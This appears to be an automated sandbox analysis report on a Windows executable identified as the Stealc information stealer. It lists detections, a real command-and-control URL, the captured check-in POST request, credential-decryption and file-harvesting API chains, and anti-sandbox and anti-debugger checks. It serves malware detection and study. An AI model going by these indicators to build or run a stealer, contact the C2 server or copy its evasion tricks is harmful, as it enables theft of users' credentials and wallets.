Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1541926
MD5:c1dcd48eb2e8b81dfac6e6c4b33a4cee
SHA1:1f3d8bf70d7cda5a72b8f6c7ddbff264e5a2bbf0
SHA256:0135c24488681db4642d0052513db7a8a11658c8ee26ec1f31947f3bf0d897cf
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5464 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C1DCD48EB2E8B81DFAC6E6C4B33A4CEE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2112766908.00000000006CE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2072045799.0000000004BD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5464JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5464JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.bf0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-25T10:27:03.731223+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.bf0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00BFC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00BF9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00BF7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00BF9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C08EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00C08EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00C038B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C04910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C04910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00BFDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00BFE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00BFED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C04570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00C04570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BFF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFF68A FindFirstFileA,0_2_00BFF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C03EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00C03EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BF16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BFDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00BFBE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 33 39 36 34 45 42 38 31 34 39 37 33 33 37 30 38 35 37 36 34 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 2d 2d 0d 0a Data Ascii: ------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="hwid"D3964EB814973370857647------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="build"doma------AKKECAFBFHJDGDHIEHJD--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00BF4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 33 39 36 34 45 42 38 31 34 39 37 33 33 37 30 38 35 37 36 34 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 2d 2d 0d 0a Data Ascii: ------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="hwid"D3964EB814973370857647------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="build"doma------AKKECAFBFHJDGDHIEHJD--
                Source: file.exe, 00000000.00000002.2112766908.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2112766908.000000000072F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2112766908.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2112766908.0000000000712000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2112766908.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/I
                Source: file.exe, 00000000.00000002.2112766908.000000000072F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2112766908.0000000000712000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2112766908.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php6
                Source: file.exe, 00000000.00000002.2112766908.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpB
                Source: file.exe, 00000000.00000002.2112766908.0000000000741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpiH
                Source: file.exe, 00000000.00000002.2112766908.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EFD1EE0_2_00EFD1EE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB69E80_2_00FB69E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB19980_2_00FB1998
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA91900_2_00FA9190
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EEEAA30_2_00EEEAA3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3A2330_2_00F3A233
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED03EF0_2_00ED03EF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FAE35E0_2_00FAE35E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106B2D00_2_0106B2D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB83160_2_00FB8316
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F25B030_2_00F25B03
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB04100_2_00FB0410
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB34050_2_00FB3405
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F85DAF0_2_00F85DAF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FAAD0A0_2_00FAAD0A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA76F00_2_00FA76F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F216B90_2_00F216B9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB4E340_2_00FB4E34
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEA62A0_2_00FEA62A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E97FD10_2_00E97FD1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAB7D30_2_00EAB7D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A867C0_2_010A867C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6B7600_2_00E6B760
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1572F0_2_00F1572F
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00BF45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: xyustrqz ZLIB complexity 0.9945280771633864
                Source: file.exe, 00000000.00000003.2072045799.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C08680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00C08680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C03720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00C03720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\WSERX58K.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1795584 > 1048576
                Source: file.exeStatic PE information: Raw size of xyustrqz is bigger than: 0x100000 < 0x190200

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.bf0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xyustrqz:EW;fcgrwzmi:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xyustrqz:EW;fcgrwzmi:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C09860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C09860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c1b71 should be: 0x1c168e
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: xyustrqz
                Source: file.exeStatic PE information: section name: fcgrwzmi
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F250E2 push ebx; mov dword ptr [esp], 5BCB2AD2h0_2_00F2510F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F250E2 push 761C1669h; mov dword ptr [esp], edx0_2_00F25120
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F250E2 push 5B8CB767h; mov dword ptr [esp], edx0_2_00F25163
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDD0DC push eax; mov dword ptr [esp], ecx0_2_00EDD0E6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDD0DC push ebp; mov dword ptr [esp], 78F6680Fh0_2_00EDD136
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDD0DC push 0428AB43h; mov dword ptr [esp], ebx0_2_00EDD172
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDD0DC push eax; mov dword ptr [esp], 31DD58F9h0_2_00EDD176
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E558DB push 64262FE1h; mov dword ptr [esp], edi0_2_00E558E3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8D0AB push 4FC3295Dh; mov dword ptr [esp], edx0_2_00F8D0C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8D0AB push ebp; mov dword ptr [esp], edi0_2_00F8D0D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8D0AB push ebp; mov dword ptr [esp], esi0_2_00F8D13D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8D0AB push ebp; mov dword ptr [esp], D6924AE3h0_2_00F8D141
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8D0AB push edi; mov dword ptr [esp], ebp0_2_00F8D1AC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8D0AB push ebp; mov dword ptr [esp], 4B3B027Ch0_2_00F8D20A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8D0AB push ecx; mov dword ptr [esp], esi0_2_00F8D218
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107E971 push 702B05D6h; mov dword ptr [esp], ebx0_2_0107E998
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE2080 push edi; mov dword ptr [esp], ecx0_2_00FE20FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD5071 push 0F34CEFFh; mov dword ptr [esp], esp0_2_00FD50B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102D19F push esi; mov dword ptr [esp], edx0_2_0102D1DD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A99BD push edi; mov dword ptr [esp], edx0_2_010A9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010919EB push 151789FAh; mov dword ptr [esp], ebx0_2_01091B5E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0B035 push ecx; ret 0_2_00C0B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010791F8 push eax; mov dword ptr [esp], 76AA7BD4h0_2_01079298
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010791F8 push 76B064D3h; mov dword ptr [esp], esi0_2_01079340
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EFD1EE push edx; mov dword ptr [esp], 3777CE34h0_2_00EFD27B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EFD1EE push edi; mov dword ptr [esp], ecx0_2_00EFD323
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EFD1EE push edx; mov dword ptr [esp], ecx0_2_00EFD33F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EFD1EE push eax; mov dword ptr [esp], ebx0_2_00EFD38C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB69E8 push eax; mov dword ptr [esp], 4A308264h0_2_00FB69F9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB69E8 push esi; mov dword ptr [esp], ebp0_2_00FB6A3A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB69E8 push eax; mov dword ptr [esp], 7D7AF077h0_2_00FB6A7E
                Source: file.exeStatic PE information: section name: xyustrqz entropy: 7.9524401943159875

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C09860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C09860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13779
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD9A2 second address: FBD9B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jg 00007F6C1537B646h 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD9B5 second address: FBD9BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBDC9B second address: FBDCED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F6C1537B646h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F6C1537B65Eh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 jmp 00007F6C1537B653h 0x0000001b pushad 0x0000001c popad 0x0000001d pop ebx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 jl 00007F6C1537B646h 0x0000002b popad 0x0000002c rdtsc
